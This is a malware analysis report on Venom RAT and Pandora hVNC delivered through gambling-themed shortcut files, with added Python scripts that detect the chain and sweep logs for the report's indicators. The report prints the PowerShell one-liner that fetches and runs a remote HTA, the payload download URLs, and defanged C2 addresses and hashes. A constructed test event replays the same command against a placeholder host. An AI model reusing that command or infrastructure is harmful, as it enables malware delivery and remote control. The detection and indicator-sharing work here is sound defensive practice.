Distribution of RAT Malware Disguised as a Gambling-related File


AhnLab SEcurity intelligence Center (ASEC) has identified the distribution of RAT malware disguised as an illegal gambling-related file. As with the VenomRAT distribution method introduced last month ([1]), the malware is spread via a shortcut (.lnk) file, and the HTA script it fetches downloads the RAT directly.

Figure 1. Operation process

The distributed shortcut file contains a malicious PowerShell command which runs mshta and downloads the malicious script.

  • PowerShell command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* 'hxxp://193.***.***[.]253:7287/2.hta.hta'

Figure 2. LNK properties

The malicious URLs in the confirmed shortcut file are as follows:

  • hxxp://193.***.***[.]253:7287/2.hta.hta
  • hxxp://193.***.***[.]253:7287/.hta
  • hxxp://85.209.176[.]158:7287/6.hta

hxxp://193.***.***[.]253:7287/2.hta.hta contains VBS code, as in the earlier case. The VBS code embeds obfuscated legitimate document files and the PowerShell commands that download the malicious RAT. The decoded PowerShell command is shown below.

Figure 3. Decoded PowerShell command

When the command shown in Figure 3 is executed, an Excel file is downloaded from hxxp://193.***.***[.]253:7287/percent.xlsm and saved as percent.xlsm inside the %APPDATA% folder. The downloaded Excel file (percent.xlsm) contains the betting methods shown in Figure 4, indicating that the threat actor is targeting users interested in gambling.

Figure 4. Content within percent.xlsm

Afterward, the command downloads an additional executable from hxxp://193.***.***[.]253:7287/darkss.exe and saves it as darkss.exe inside the %APPDATA% folder. The downloaded executable is Venom RAT, which not only steals keystrokes and user credentials but also performs various other malicious activities on commands received from the threat actor.
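The chain described above (shortcut file, PowerShell, a wildcard-obfuscated path to mshta, a remote HTA, then payloads written into %APPDATA%) leaves several hooks a defender can key on. The Python below is an added example written for this post and is not ASEC's code or anything recovered from the samples: it resolves the wildcard path from the Figure 2 command against a constructed directory listing to show that the pattern can only land on mshta.exe, and then runs the same check, a remote-HTA-argument check and an %APPDATA% drop check over constructed process- and file-creation events. The event schema and the directory listing are assumptions, and 192.0.2.10 is a documentation-range placeholder standing in for the masked 193.***.***[.]253.

```python
"""Triage of constructed endpoint telemetry for the LNK -> PowerShell -> mshta -> HTA chain."""
import fnmatch
import re

# Constructed stand-in for a directory listing of the victim host (assumption:
# on a real host this would come from os.walk over C:\). Lower-cased because
# Windows path matching is case-insensitive.
SAMPLE_FILESYSTEM = [
    r"c:\windows\system32\mshta.exe",
    r"c:\windows\system32\mshtml.dll",
    r"c:\windows\system32\mspaint.exe",
    r"c:\windows\system32\cmd.exe",
    r"c:\windows\syswow64\mshta.exe",
]


def resolve_wildcard_path(pattern, filesystem):
    """Return every path in `filesystem` that the wildcard `pattern` matches.

    Matching is done segment by segment so that '*' cannot swallow a backslash,
    which is how the shell resolves a path such as C:\W*\S*2\m*h?a.*.
    """
    pat_segs = pattern.lower().split("\\")
    hits = []
    for path in filesystem:
        segs = path.lower().split("\\")
        if len(segs) == len(pat_segs) and all(
            fnmatch.fnmatchcase(seg, pat) for seg, pat in zip(segs, pat_segs)
        ):
            hits.append(path)
    return hits


# A drive-letter path containing at least one '*' or '?' (legitimate command
# lines almost never pass wildcards in the program path itself).
WILDCARD_PATH = re.compile(r"[A-Za-z]:\\[^\s'\"]*[*?][^\s'\"]*")
# A URL whose target is an .hta file, the argument mshta receives in this chain.
REMOTE_HTA = re.compile(r"https?://[^\s'\"]+\.hta\b", re.IGNORECASE)
# An executable or macro workbook written directly into %APPDATA% (Roaming).
APPDATA_DROP = re.compile(r"\\AppData\\Roaming\\[^\\]+\.(exe|xlsm)$", re.IGNORECASE)


def analyze_command_line(cmdline, filesystem):
    """Explain what a suspicious command line does instead of just flagging it."""
    findings = []
    for m in WILDCARD_PATH.finditer(cmdline):
        resolved = resolve_wildcard_path(m.group(0), filesystem)
        findings.append(f"wildcard path {m.group(0)} resolves to {resolved or 'nothing'}")
        if any(p.endswith("\\mshta.exe") for p in resolved):
            findings.append("wildcard path hides mshta.exe")
    for m in REMOTE_HTA.finditer(cmdline):
        findings.append(f"remote HTA argument {m.group(0)}")
    return findings


def analyze_file_event(event):
    """PowerShell dropping an .exe/.xlsm straight into %APPDATA% matches the observed chain."""
    if event["image"].lower().endswith("\\powershell.exe") and APPDATA_DROP.search(event["path"]):
        return [f"PowerShell wrote {event['path']} into %APPDATA%"]
    return []


def triage(events, filesystem):
    """Map event id -> findings for every event that produced at least one finding."""
    alerts = {}
    for ev in events:
        if ev["type"] == "process":
            findings = analyze_command_line(ev["command_line"], filesystem)
        else:
            findings = analyze_file_event(ev)
        if findings:
            alerts[ev["id"]] = findings
    return alerts


# Constructed events: 1 and 3 reproduce the post's chain with a placeholder IP,
# 4 is the darkss.exe drop into %APPDATA%, 2 and 5 are benign controls.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe . $env:C:\W*\S*2\m*h?a.* 'http://192.0.2.10:7287/2.hta.hta'"},
    {"id": 2, "type": "process", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"id": 3, "type": "process",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe http://192.0.2.10:7287/2.hta.hta"},
    {"id": 4, "type": "file",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "path": r"C:\Users\user\AppData\Roaming\darkss.exe"},
    {"id": 5, "type": "file",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB"},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS, SAMPLE_FILESYSTEM).items():
        print(event_id, findings)
```

Resolving the wildcard rather than merely flagging it matters for triage: the pattern is opaque to a string match on "mshta", and the segment-wise resolution shows an analyst exactly which binary the shortcut would have launched.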

Figure 5. Part of darkss.exe (Venom RAT) code

  • C2: 193.***.***[.]253:4449

The previously mentioned servers (193.***.***[.]253:7287, 85.209.176[.]158:7287) host various other malicious files besides those covered in this post, such as HTA scripts, decoy document files, and malicious executables.

Figure 6. List of additional files found on the malicious URL

The additional decoy document files that were found also contained information about gambling websites as well as personal information of some users.

Figure 7. Additional decoy document file 1 (2023_12.xlsx)

Figure 8. Additional decoy document file 2 (testDB.xlsx)

Darksoft111.exe and Pandora_cryptered.exe shown in Figure 6 are Venom RAT and Pandora hVNC malware, respectively. Users are advised to take extra caution as the threat actor is using various types of RAT malware.

Figure 9. Part of Pandora_cryptered.exe (Pandora hVNC) code

[File Detection]
Downloader/LNK.Generic.S2541 (2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

[Behavior Detection]
Execution/MDP.Powershell.M2514

MD5

04dc064b9e6fbc1466f5844c2dd422a4
0bb437212ee1af602f7a34670825ff43
15e98eb4a6fd73ff10cac751d467375e
20a88382040e47209e50652599d92440
97e5b88cf1a452393c790ff84f08e3be

URL

http[:]//85[.]209[.]176[.]158[:]1337/
http[:]//85[.]209[.]176[.]158[:]4449/
http[:]//85[.]209[.]176[.]158[:]7287/
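Indicators are published defanged ([.] and [:] in the list above, hxxp in the body), so before they can be matched against telemetry they have to be restored to their real form. The Python below is an added example, not part of the post: it refangs the post's own URLs and MD5s, reduces the URLs to host:port endpoints (the paths vary per victim while the server and port do not), and sweeps a constructed proxy/EDR log for them. The log format, the host name WS-07, the sample.exe path and the 10.0.0.5 client are constructed; 192.0.2.50 and the empty-file MD5 d41d8cd98f00b204e9800998ecf8427e are benign controls that must not match.

```python
"""Refang the post's defanged indicators and sweep constructed logs for them."""
import re
from urllib.parse import urlsplit

# Indicators copied exactly as they appear in the post, defanging included.
PAGE_MD5 = [
    "04dc064b9e6fbc1466f5844c2dd422a4",
    "0bb437212ee1af602f7a34670825ff43",
    "15e98eb4a6fd73ff10cac751d467375e",
    "20a88382040e47209e50652599d92440",
    "97e5b88cf1a452393c790ff84f08e3be",
]
PAGE_URLS = [
    "http[:]//85[.]209[.]176[.]158[:]1337/",
    "http[:]//85[.]209[.]176[.]158[:]4449/",
    "http[:]//85[.]209[.]176[.]158[:]7287/",
    "hxxp://85.209.176[.]158:7287/6.hta",  # the body of the post uses the hxxp style
]


def refang(ioc):
    """Undo the defanging conventions used in threat reports (hxxp, [.], [:], (.))."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    for defanged, real in (("[.]", "."), ("(.)", "."), ("[:]", ":"), ("[://]", "://")):
        s = s.replace(defanged, real)
    return s


def url_endpoint(url):
    """Reduce a URL to 'host:port', defaulting the port from the scheme."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return f"{parts.hostname}:{port}"


def build_indicator_sets(defanged_urls, md5s):
    """Return (set of host:port endpoints, set of lower-case MD5 strings)."""
    endpoints = {url_endpoint(refang(u)) for u in defanged_urls}
    hashes = {h.lower() for h in md5s}
    return endpoints, hashes


DST_RE = re.compile(r"\bdst=(\S+)")
MD5_RE = re.compile(r"\bmd5=([0-9a-fA-F]{32})\b")


def scan_log(log_text, endpoints, hashes):
    """Return (line number, reason) for every log line that touches a known indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = DST_RE.search(line)
        if m and m.group(1) in endpoints:
            hits.append((n, f"connection to known endpoint {m.group(1)}"))
        m = MD5_RE.search(line)
        if m and m.group(1).lower() in hashes:
            hits.append((n, f"file with known MD5 {m.group(1)}"))
    return hits


# Constructed key=value log: lines 1 and 3 reach the post's server, line 4 writes a
# file with one of the post's MD5s; lines 2 and 5 are benign controls.
SAMPLE_LOG = r"""2024-01-29T10:15:02Z src=10.0.0.5 dst=85.209.176.158:7287 method=GET path=/6.hta
2024-01-29T10:15:03Z src=10.0.0.5 dst=192.0.2.50:443 method=GET path=/index.html
2024-01-29T10:15:09Z src=10.0.0.5 dst=85.209.176.158:4449 method=CONNECT path=-
2024-01-29T10:16:00Z host=WS-07 event=file_create path=C:\Users\user\AppData\Roaming\sample.exe md5=97e5b88cf1a452393c790ff84f08e3be
2024-01-29T10:16:05Z host=WS-07 event=file_create path=C:\Users\user\Downloads\notes.txt md5=d41d8cd98f00b204e9800998ecf8427e
"""

if __name__ == "__main__":
    endpoints, hashes = build_indicator_sets(PAGE_URLS, PAGE_MD5)
    for line_no, reason in scan_log(SAMPLE_LOG, endpoints, hashes):
        print(line_no, reason)
```

Matching on host:port rather than on the full URL is a deliberate choice for this campaign: the same server was seen serving several HTA names and payloads on port 7287 and taking C2 traffic on 4449, so the endpoint is the stable part of the indicator.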

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.